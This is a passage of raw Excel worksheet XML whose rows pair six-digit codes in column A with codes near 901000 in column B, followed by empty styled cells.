      <c r="E6864" s="3"/>
      <c r="F6864" s="1"/>
      <c r="H6864" s="1"/>
    </row>
    <row r="6865" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6865" s="5">
        <v>700386</v>
      </c>
      <c r="B6865" s="3">
        <v>901005</v>
      </c>
      <c r="D6865" s="5"/>
      <c r="E6865" s="3"/>
      <c r="F6865" s="1"/>
      <c r="H6865" s="1"/>
    </row>
    <row r="6866" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6866" s="5">
        <v>700386</v>
      </c>
      <c r="B6866" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D6866" s="5"/>
      <c r="E6866" s="3"/>
      <c r="F6866" s="1"/>
      <c r="H6866" s="1"/>
    </row>
    <row r="6867" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6867" s="5">
        <v>700386</v>
      </c>
      <c r="B6867" s="3">
        <v>901140</v>
      </c>
      <c r="D6867" s="5"/>
      <c r="E6867" s="3"/>
      <c r="F6867" s="1"/>
      <c r="H6867" s="1"/>
    </row>
    <row r="6868" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6868" s="5">
        <v>700386</v>
      </c>
      <c r="B6868" s="3">
        <v>901568.00199999998</v>
      </c>
      <c r="D6868" s="5"/>
      <c r="E6868" s="3"/>
      <c r="F6868" s="1"/>
      <c r="H6868" s="1"/>
    </row>
    <row r="6869" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6869" s="5">
        <v>700386</v>
      </c>
      <c r="B6869" s="3">
        <v>901041</v>
      </c>
      <c r="D6869" s="5"/>
      <c r="E6869" s="3"/>
      <c r="F6869" s="1"/>
      <c r="H6869" s="1"/>
    </row>
    <row r="6870" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6870" s="5">
        <v>700386</v>
      </c>
      <c r="B6870" s="3">
        <v>901564.00300000003</v>
      </c>
      <c r="D6870" s="5"/>
      <c r="E6870" s="3"/>
      <c r="F6870" s="1"/>
      <c r="H6870" s="1"/>
    </row>
    <row r="6871" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6871" s="5">
        <v>700386</v>
      </c>
      <c r="B6871" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6871" s="5"/>
      <c r="E6871" s="3"/>
      <c r="F6871" s="1"/>
      <c r="H6871" s="1"/>
    </row>
    <row r="6872" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6872" s="5">
        <v>700386</v>
      </c>
      <c r="B6872" s="3">
        <v>901105</v>
      </c>
      <c r="D6872" s="5"/>
      <c r="E6872" s="3"/>
      <c r="F6872" s="1"/>
      <c r="H6872" s="1"/>
    </row>
    <row r="6873" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6873" s="5">
        <v>700386</v>
      </c>
      <c r="B6873" s="3">
        <v>901056.00399999996</v>
      </c>
      <c r="D6873" s="5"/>
      <c r="E6873" s="3"/>
      <c r="F6873" s="1"/>
      <c r="H6873" s="1"/>
    </row>
    <row r="6874" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6874" s="5">
        <v>700386</v>
      </c>
      <c r="B6874" s="3">
        <v>901559.00100000005</v>
      </c>
      <c r="D6874" s="5"/>
      <c r="E6874" s="3"/>
      <c r="F6874" s="1"/>
      <c r="H6874" s="1"/>
    </row>
    <row r="6875" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6875" s="5">
        <v>700386</v>
      </c>
      <c r="B6875" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6875" s="5"/>
      <c r="E6875" s="3"/>
      <c r="F6875" s="1"/>
      <c r="H6875" s="1"/>
    </row>
    <row r="6876" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6876" s="5">
        <v>700386</v>
      </c>
      <c r="B6876" s="3">
        <v>901112</v>
      </c>
      <c r="D6876" s="5"/>
      <c r="E6876" s="3"/>
      <c r="F6876" s="1"/>
      <c r="H6876" s="1"/>
    </row>
    <row r="6877" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6877" s="5">
        <v>700386</v>
      </c>
      <c r="B6877" s="3">
        <v>901106</v>
      </c>
      <c r="D6877" s="5"/>
      <c r="E6877" s="3"/>
      <c r="F6877" s="1"/>
      <c r="H6877" s="1"/>
    </row>
    <row r="6878" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6878" s="5">
        <v>700386</v>
      </c>
      <c r="B6878" s="3">
        <v>901027</v>
      </c>
      <c r="D6878" s="5"/>
      <c r="E6878" s="3"/>
      <c r="F6878" s="1"/>
      <c r="H6878" s="1"/>
    </row>
    <row r="6879" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6879" s="5">
        <v>700386</v>
      </c>
      <c r="B6879" s="3">
        <v>901057</v>
      </c>
      <c r="D6879" s="5"/>
      <c r="E6879" s="3"/>
      <c r="F6879" s="1"/>
      <c r="H6879" s="1"/>
    </row>
    <row r="6880" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6880" s="5">
        <v>700386</v>
      </c>
      <c r="B6880" s="3">
        <v>901055.005</v>
      </c>
      <c r="D6880" s="5"/>
      <c r="E6880" s="3"/>
      <c r="F6880" s="1"/>
      <c r="H6880" s="1"/>
    </row>
    <row r="6881" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6881" s="5">
        <v>700386</v>
      </c>
      <c r="B6881" s="3">
        <v>901055.01199999999</v>
      </c>
      <c r="D6881" s="5"/>
      <c r="E6881" s="3"/>
      <c r="F6881" s="1"/>
      <c r="H6881" s="1"/>
    </row>
    <row r="6882" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6882" s="5">
        <v>700386</v>
      </c>
      <c r="B6882" s="3">
        <v>901090</v>
      </c>
      <c r="D6882" s="5"/>
      <c r="E6882" s="3"/>
      <c r="F6882" s="1"/>
      <c r="H6882" s="1"/>
    </row>
    <row r="6883" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6883" s="5">
        <v>700386</v>
      </c>
      <c r="B6883" s="3">
        <v>901090.00300000003</v>
      </c>
      <c r="D6883" s="5"/>
      <c r="E6883" s="3"/>
      <c r="F6883" s="1"/>
      <c r="H6883" s="1"/>
    </row>
    <row r="6884" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6884" s="5">
        <v>700386</v>
      </c>
      <c r="B6884" s="3">
        <v>901012</v>
      </c>
      <c r="D6884" s="5"/>
      <c r="E6884" s="3"/>
      <c r="F6884" s="1"/>
      <c r="H6884" s="1"/>
    </row>
    <row r="6885" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6885" s="5">
        <v>700386</v>
      </c>
      <c r="B6885" s="3">
        <v>901091</v>
      </c>
      <c r="D6885" s="5"/>
      <c r="E6885" s="3"/>
      <c r="F6885" s="1"/>
      <c r="H6885" s="1"/>
    </row>
    <row r="6886" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6886" s="5">
        <v>700386</v>
      </c>
      <c r="B6886" s="3">
        <v>901113</v>
      </c>
      <c r="D6886" s="5"/>
      <c r="E6886" s="3"/>
      <c r="F6886" s="1"/>
      <c r="H6886" s="1"/>
    </row>
    <row r="6887" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6887" s="5">
        <v>700386</v>
      </c>
      <c r="B6887" s="3">
        <v>901082</v>
      </c>
      <c r="D6887" s="5"/>
      <c r="E6887" s="3"/>
      <c r="F6887" s="1"/>
      <c r="H6887" s="1"/>
    </row>
    <row r="6888" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6888" s="5">
        <v>700386</v>
      </c>
      <c r="B6888" s="3">
        <v>901007</v>
      </c>
      <c r="D6888" s="5"/>
      <c r="E6888" s="3"/>
      <c r="F6888" s="1"/>
      <c r="H6888" s="1"/>
    </row>
    <row r="6889" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6889" s="5">
        <v>700386</v>
      </c>
      <c r="B6889" s="3">
        <v>901080</v>
      </c>
      <c r="D6889" s="5"/>
      <c r="E6889" s="3"/>
      <c r="F6889" s="1"/>
      <c r="H6889" s="1"/>
    </row>
    <row r="6890" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6890" s="5">
        <v>700386</v>
      </c>
      <c r="B6890" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D6890" s="5"/>
      <c r="E6890" s="3"/>
      <c r="F6890" s="1"/>
      <c r="H6890" s="1"/>
    </row>
    <row r="6891" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6891" s="5">
        <v>700386</v>
      </c>
      <c r="B6891" s="3">
        <v>901047</v>
      </c>
      <c r="D6891" s="5"/>
      <c r="E6891" s="3"/>
      <c r="F6891" s="1"/>
      <c r="H6891" s="1"/>
    </row>
    <row r="6892" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6892" s="5">
        <v>700452</v>
      </c>
      <c r="B6892" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D6892" s="5"/>
      <c r="E6892" s="3"/>
      <c r="F6892" s="1"/>
      <c r="H6892" s="1"/>
    </row>
    <row r="6893" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6893" s="5">
        <v>700452</v>
      </c>
      <c r="B6893" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6893" s="5"/>
      <c r="E6893" s="3"/>
      <c r="F6893" s="1"/>
      <c r="H6893" s="1"/>
    </row>
    <row r="6894" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6894" s="5">
        <v>700452</v>
      </c>
      <c r="B6894" s="3">
        <v>901005</v>
      </c>
      <c r="D6894" s="5"/>
      <c r="E6894" s="3"/>
      <c r="F6894" s="1"/>
      <c r="H6894" s="1"/>
    </row>
    <row r="6895" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6895" s="5">
        <v>700452</v>
      </c>
      <c r="B6895" s="3">
        <v>901083</v>
      </c>
      <c r="D6895" s="5"/>
      <c r="E6895" s="3"/>
      <c r="F6895" s="1"/>
      <c r="H6895" s="1"/>
    </row>
    <row r="6896" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6896" s="5">
        <v>700452</v>
      </c>
      <c r="B6896" s="3">
        <v>901120</v>
      </c>
      <c r="D6896" s="5"/>
      <c r="E6896" s="3"/>
      <c r="F6896" s="1"/>
      <c r="H6896" s="1"/>
    </row>
    <row r="6897" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6897" s="5">
        <v>700452</v>
      </c>
      <c r="B6897" s="3">
        <v>901057</v>
      </c>
      <c r="D6897" s="5"/>
      <c r="E6897" s="3"/>
      <c r="F6897" s="1"/>
      <c r="H6897" s="1"/>
    </row>
    <row r="6898" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6898" s="5">
        <v>700452</v>
      </c>
      <c r="B6898" s="3">
        <v>901018</v>
      </c>
      <c r="D6898" s="5"/>
      <c r="E6898" s="3"/>
      <c r="F6898" s="1"/>
      <c r="H6898" s="1"/>
    </row>
    <row r="6899" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6899" s="5">
        <v>700452</v>
      </c>
      <c r="B6899" s="3">
        <v>901091</v>
      </c>
      <c r="D6899" s="5"/>
      <c r="E6899" s="3"/>
      <c r="F6899" s="1"/>
      <c r="H6899" s="1"/>
    </row>
    <row r="6900" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6900" s="5">
        <v>700452</v>
      </c>
      <c r="B6900" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D6900" s="5"/>
      <c r="E6900" s="3"/>
      <c r="F6900" s="1"/>
      <c r="H6900" s="1"/>
    </row>
    <row r="6901" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6901" s="5">
        <v>700452</v>
      </c>
      <c r="B6901" s="3">
        <v>901016</v>
      </c>
      <c r="D6901" s="5"/>
      <c r="E6901" s="3"/>
      <c r="F6901" s="1"/>
      <c r="H6901" s="1"/>
    </row>
    <row r="6902" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6902" s="5">
        <v>700452</v>
      </c>
      <c r="B6902" s="3">
        <v>901049</v>
      </c>
      <c r="D6902" s="5"/>
      <c r="E6902" s="3"/>
      <c r="F6902" s="1"/>
      <c r="H6902" s="1"/>
    </row>
    <row r="6903" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6903" s="5">
        <v>700136</v>
      </c>
      <c r="B6903" s="3">
        <v>901119</v>
      </c>
      <c r="D6903" s="5"/>
      <c r="E6903" s="3"/>
      <c r="F6903" s="1"/>
      <c r="H6903" s="1"/>
    </row>
    <row r="6904" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6904" s="5">
        <v>700136</v>
      </c>
      <c r="B6904" s="3">
        <v>901020</v>
      </c>
      <c r="D6904" s="5"/>
      <c r="E6904" s="3"/>
      <c r="F6904" s="1"/>
      <c r="H6904" s="1"/>
    </row>
    <row r="6905" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6905" s="5">
        <v>700136</v>
      </c>
      <c r="B6905" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6905" s="5"/>
      <c r="E6905" s="3"/>
      <c r="F6905" s="1"/>
      <c r="H6905" s="1"/>
    </row>
    <row r="6906" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6906" s="5">
        <v>700136</v>
      </c>
      <c r="B6906" s="3">
        <v>901092</v>
      </c>
      <c r="D6906" s="5"/>
      <c r="E6906" s="3"/>
      <c r="F6906" s="1"/>
      <c r="H6906" s="1"/>
    </row>
    <row r="6907" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6907" s="5">
        <v>700136</v>
      </c>
      <c r="B6907" s="3">
        <v>901025</v>
      </c>
      <c r="D6907" s="5"/>
      <c r="E6907" s="3"/>
      <c r="F6907" s="1"/>
      <c r="H6907" s="1"/>
    </row>
    <row r="6908" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6908" s="5">
        <v>700136</v>
      </c>
      <c r="B6908" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D6908" s="5"/>
      <c r="E6908" s="3"/>
      <c r="F6908" s="1"/>
      <c r="H6908" s="1"/>
    </row>
    <row r="6909" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6909" s="5">
        <v>700136</v>
      </c>
      <c r="B6909" s="3">
        <v>901052.00100000005</v>
      </c>
      <c r="D6909" s="5"/>
      <c r="E6909" s="3"/>
      <c r="F6909" s="1"/>
      <c r="H6909" s="1"/>
    </row>
    <row r="6910" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6910" s="5">
        <v>700136</v>
      </c>
      <c r="B6910" s="3">
        <v>901083</v>
      </c>
      <c r="D6910" s="5"/>
      <c r="E6910" s="3"/>
      <c r="F6910" s="1"/>
      <c r="H6910" s="1"/>
    </row>
    <row r="6911" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6911" s="5">
        <v>700136</v>
      </c>
      <c r="B6911" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6911" s="5"/>
      <c r="E6911" s="3"/>
      <c r="F6911" s="1"/>
      <c r="H6911" s="1"/>
    </row>
    <row r="6912" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6912" s="5">
        <v>700136</v>
      </c>
      <c r="B6912" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="D6912" s="5"/>
      <c r="E6912" s="3"/>
      <c r="F6912" s="1"/>
      <c r="H6912" s="1"/>
    </row>
    <row r="6913" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6913" s="5">
        <v>700136</v>
      </c>
      <c r="B6913" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6913" s="5"/>
      <c r="E6913" s="3"/>
      <c r="F6913" s="1"/>
      <c r="H6913" s="1"/>
    </row>
    <row r="6914" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6914" s="5">
        <v>700136</v>
      </c>
      <c r="B6914" s="3">
        <v>901027</v>
      </c>
      <c r="D6914" s="5"/>
      <c r="E6914" s="3"/>
      <c r="F6914" s="1"/>
      <c r="H6914" s="1"/>
    </row>
    <row r="6915" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6915" s="5">
        <v>700136</v>
      </c>
      <c r="B6915" s="3">
        <v>901120</v>
      </c>
      <c r="D6915" s="5"/>
      <c r="E6915" s="3"/>
      <c r="F6915" s="1"/>
      <c r="H6915" s="1"/>
    </row>
    <row r="6916" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6916" s="5">
        <v>700136</v>
      </c>
      <c r="B6916" s="3">
        <v>901091</v>
      </c>
      <c r="D6916" s="5"/>
      <c r="E6916" s="3"/>
      <c r="F6916" s="1"/>
      <c r="H6916" s="1"/>
    </row>
    <row r="6917" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6917" s="5">
        <v>700476</v>
      </c>
      <c r="B6917" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D6917" s="5"/>
      <c r="E6917" s="3"/>
      <c r="F6917" s="1"/>
      <c r="H6917" s="1"/>
    </row>
    <row r="6918" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6918" s="5">
        <v>700476</v>
      </c>
      <c r="B6918" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="D6918" s="5"/>
      <c r="E6918" s="3"/>
      <c r="F6918" s="1"/>
      <c r="H6918" s="1"/>
    </row>
    <row r="6919" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6919" s="5">
        <v>700476</v>
      </c>
      <c r="B6919" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6919" s="5"/>
      <c r="E6919" s="3"/>
      <c r="F6919" s="1"/>
      <c r="H6919" s="1"/>
    </row>
    <row r="6920" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6920" s="5">
        <v>700476</v>
      </c>
      <c r="B6920" s="3">
        <v>901119</v>
      </c>
      <c r="D6920" s="5"/>
      <c r="E6920" s="3"/>
      <c r="F6920" s="1"/>
      <c r="H6920" s="1"/>
    </row>
    <row r="6921" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6921" s="5">
        <v>700476</v>
      </c>
      <c r="B6921" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D6921" s="5"/>
      <c r="E6921" s="3"/>
      <c r="F6921" s="1"/>
      <c r="H6921" s="1"/>
    </row>
    <row r="6922" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6922" s="5">
        <v>700476</v>
      </c>
      <c r="B6922" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D6922" s="5"/>
      <c r="E6922" s="3"/>
      <c r="F6922" s="1"/>
      <c r="H6922" s="1"/>
    </row>
    <row r="6923" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6923" s="5">
        <v>700476</v>
      </c>
      <c r="B6923" s="3">
        <v>901555.00399999996</v>
      </c>
      <c r="D6923" s="5"/>
      <c r="E6923" s="3"/>
      <c r="F6923" s="1"/>
      <c r="H6923" s="1"/>
    </row>
    <row r="6924" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6924" s="5">
        <v>700476</v>
      </c>
      <c r="B6924" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D6924" s="5"/>
      <c r="E6924" s="3"/>
      <c r="F6924" s="1"/>
      <c r="H6924" s="1"/>
    </row>
    <row r="6925" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6925" s="5">
        <v>700476</v>
      </c>
      <c r="B6925" s="3">
        <v>901140</v>
      </c>
      <c r="D6925" s="5"/>
      <c r="E6925" s="3"/>
      <c r="F6925" s="1"/>
      <c r="H6925" s="1"/>
    </row>
    <row r="6926" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6926" s="5">
        <v>700476</v>
      </c>
      <c r="B6926" s="3">
        <v>901114.00199999998</v>
      </c>
      <c r="D6926" s="5"/>
      <c r="E6926" s="3"/>
      <c r="F6926" s="1"/>
      <c r="H6926" s="1"/>
    </row>
    <row r="6927" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6927" s="5">
        <v>700476</v>
      </c>
      <c r="B6927" s="3">
        <v>901041</v>
      </c>
      <c r="D6927" s="5"/>
      <c r="E6927" s="3"/>
      <c r="F6927" s="1"/>
      <c r="H6927" s="1"/>
    </row>
    <row r="6928" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6928" s="5">
        <v>700476</v>
      </c>
      <c r="B6928" s="3">
        <v>901008</v>
      </c>
      <c r="D6928" s="5"/>
      <c r="E6928" s="3"/>
      <c r="F6928" s="1"/>
      <c r="H6928" s="1"/>
    </row>
    <row r="6929" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6929" s="5">
        <v>700476</v>
      </c>
      <c r="B6929" s="3">
        <v>901564.00399999996</v>
      </c>
      <c r="D6929" s="5"/>
      <c r="E6929" s="3"/>
      <c r="F6929" s="1"/>
      <c r="H6929" s="1"/>
    </row>
    <row r="6930" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6930" s="5">
        <v>700476</v>
      </c>
      <c r="B6930" s="3">
        <v>901105</v>
      </c>
      <c r="D6930" s="5"/>
      <c r="E6930" s="3"/>
      <c r="F6930" s="1"/>
      <c r="H6930" s="1"/>
    </row>
    <row r="6931" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6931" s="5">
        <v>700476</v>
      </c>
      <c r="B6931" s="3">
        <v>901559.00199999998</v>
      </c>
      <c r="D6931" s="5"/>
      <c r="E6931" s="3"/>
      <c r="F6931" s="1"/>
      <c r="H6931" s="1"/>
    </row>
    <row r="6932" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6932" s="5">
        <v>700476</v>
      </c>
      <c r="B6932" s="3">
        <v>901112</v>
      </c>
      <c r="D6932" s="5"/>
      <c r="E6932" s="3"/>
      <c r="F6932" s="1"/>
      <c r="H6932" s="1"/>
    </row>
    <row r="6933" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6933" s="5">
        <v>700476</v>
      </c>
      <c r="B6933" s="3">
        <v>901104</v>
      </c>
      <c r="D6933" s="5"/>
      <c r="E6933" s="3"/>
      <c r="F6933" s="1"/>
      <c r="H6933" s="1"/>
    </row>
    <row r="6934" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6934" s="5">
        <v>700476</v>
      </c>
      <c r="B6934" s="3">
        <v>901027</v>
      </c>
      <c r="D6934" s="5"/>
      <c r="E6934" s="3"/>
      <c r="F6934" s="1"/>
      <c r="H6934" s="1"/>
    </row>
    <row r="6935" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6935" s="5">
        <v>700476</v>
      </c>
      <c r="B6935" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D6935" s="5"/>
      <c r="E6935" s="3"/>
      <c r="F6935" s="1"/>
      <c r="H6935" s="1"/>
    </row>
    <row r="6936" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6936" s="5">
        <v>700476</v>
      </c>
      <c r="B6936" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D6936" s="5"/>
      <c r="E6936" s="3"/>
      <c r="F6936" s="1"/>
      <c r="H6936" s="1"/>
    </row>
    <row r="6937" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6937" s="5">
        <v>700476</v>
      </c>
      <c r="B6937" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D6937" s="5"/>
      <c r="E6937" s="3"/>
      <c r="F6937" s="1"/>
      <c r="H6937" s="1"/>
    </row>
    <row r="6938" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6938" s="5">
        <v>700476</v>
      </c>
      <c r="B6938" s="3">
        <v>901057</v>
      </c>
      <c r="D6938" s="5"/>
      <c r="E6938" s="3"/>
      <c r="F6938" s="1"/>
      <c r="H6938" s="1"/>
    </row>
    <row r="6939" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6939" s="5">
        <v>700476</v>
      </c>
      <c r="B6939" s="3">
        <v>901012</v>
      </c>
      <c r="D6939" s="5"/>
      <c r="E6939" s="3"/>
      <c r="F6939" s="1"/>
      <c r="H6939" s="1"/>
    </row>
    <row r="6940" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6940" s="5">
        <v>700476</v>
      </c>
      <c r="B6940" s="3">
        <v>901053.005</v>
      </c>
      <c r="D6940" s="5"/>
      <c r="E6940" s="3"/>
      <c r="F6940" s="1"/>
      <c r="H6940" s="1"/>
    </row>
    <row r="6941" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6941" s="5">
        <v>700476</v>
      </c>
      <c r="B6941" s="3">
        <v>901113</v>
      </c>
      <c r="D6941" s="5"/>
      <c r="E6941" s="3"/>
      <c r="F6941" s="1"/>
      <c r="H6941" s="1"/>
    </row>
    <row r="6942" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6942" s="5">
        <v>700476</v>
      </c>
      <c r="B6942" s="3">
        <v>901218.01</v>
      </c>
      <c r="D6942" s="5"/>
      <c r="E6942" s="3"/>
      <c r="F6942" s="1"/>
      <c r="H6942" s="1"/>
    </row>
    <row r="6943" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6943" s="5">
        <v>700476</v>
      </c>
      <c r="B6943" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D6943" s="5"/>
      <c r="E6943" s="3"/>
      <c r="F6943" s="1"/>
      <c r="H6943" s="1"/>
    </row>
    <row r="6944" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6944" s="5">
        <v>700476</v>
      </c>
      <c r="B6944" s="3">
        <v>901082</v>
      </c>
      <c r="D6944" s="5"/>
      <c r="E6944" s="3"/>
      <c r="F6944" s="1"/>
      <c r="H6944" s="1"/>
    </row>
    <row r="6945" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6945" s="5">
        <v>700476</v>
      </c>
      <c r="B6945" s="3">
        <v>901016</v>
      </c>
      <c r="D6945" s="5"/>
      <c r="E6945" s="3"/>
      <c r="F6945" s="1"/>
      <c r="H6945" s="1"/>
    </row>
    <row r="6946" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6946" s="5">
        <v>700476</v>
      </c>
      <c r="B6946" s="3">
        <v>901033</v>
      </c>
      <c r="D6946" s="5"/>
      <c r="E6946" s="3"/>
      <c r="F6946" s="1"/>
      <c r="H6946" s="1"/>
    </row>
    <row r="6947" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6947" s="5">
        <v>700476</v>
      </c>
      <c r="B6947" s="3">
        <v>901552.00199999998</v>
      </c>
      <c r="D6947" s="5"/>
      <c r="E6947" s="3"/>
      <c r="F6947" s="1"/>
      <c r="H6947" s="1"/>
    </row>
    <row r="6948" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6948" s="5">
        <v>700476</v>
      </c>
      <c r="B6948" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D6948" s="5"/>
      <c r="E6948" s="3"/>
      <c r="F6948" s="1"/>
      <c r="H6948" s="1"/>
    </row>
    <row r="6949" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6949" s="5">
        <v>700476</v>
      </c>
      <c r="B6949" s="3">
        <v>901047</v>
      </c>
      <c r="D6949" s="5"/>
      <c r="E6949" s="3"/>
      <c r="F6949" s="1"/>
      <c r="H6949" s="1"/>
    </row>
    <row r="6950" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6950" s="5">
        <v>700636</v>
      </c>
      <c r="B6950" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6950" s="5"/>
      <c r="E6950" s="3"/>
      <c r="F6950" s="1"/>
      <c r="H6950" s="1"/>
    </row>
    <row r="6951" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6951" s="5">
        <v>700636</v>
      </c>
      <c r="B6951" s="3">
        <v>901140</v>
      </c>
      <c r="D6951" s="5"/>
      <c r="E6951" s="3"/>
      <c r="F6951" s="1"/>
      <c r="H6951" s="1"/>
    </row>
    <row r="6952" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6952" s="5">
        <v>700636</v>
      </c>
      <c r="B6952" s="3">
        <v>901480</v>
      </c>
      <c r="D6952" s="5"/>
      <c r="E6952" s="3"/>
      <c r="F6952" s="1"/>
      <c r="H6952" s="1"/>
    </row>
    <row r="6953" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6953" s="5">
        <v>700636</v>
      </c>
      <c r="B6953" s="3">
        <v>901105</v>
      </c>
      <c r="D6953" s="5"/>
      <c r="E6953" s="3"/>
      <c r="F6953" s="1"/>
      <c r="H6953" s="1"/>
    </row>
    <row r="6954" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6954" s="5">
        <v>700207</v>
      </c>
      <c r="B6954" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6954" s="5"/>
      <c r="E6954" s="3"/>
      <c r="F6954" s="1"/>
      <c r="H6954" s="1"/>
    </row>
    <row r="6955" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6955" s="5">
        <v>700207</v>
      </c>
      <c r="B6955" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6955" s="5"/>
      <c r="E6955" s="3"/>
      <c r="F6955" s="1"/>
      <c r="H6955" s="1"/>
    </row>
    <row r="6956" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6956" s="5">
        <v>700207</v>
      </c>
      <c r="B6956" s="3">
        <v>901105</v>
      </c>
      <c r="D6956" s="5"/>
      <c r="E6956" s="3"/>
      <c r="F6956" s="1"/>
      <c r="H6956" s="1"/>
    </row>
    <row r="6957" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6957" s="5">
        <v>700207</v>
      </c>
      <c r="B6957" s="3">
        <v>901090</v>
      </c>
      <c r="D6957" s="5"/>
      <c r="E6957" s="3"/>
      <c r="F6957" s="1"/>
      <c r="H6957" s="1"/>
    </row>
    <row r="6958" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6958" s="5">
        <v>700442</v>
      </c>
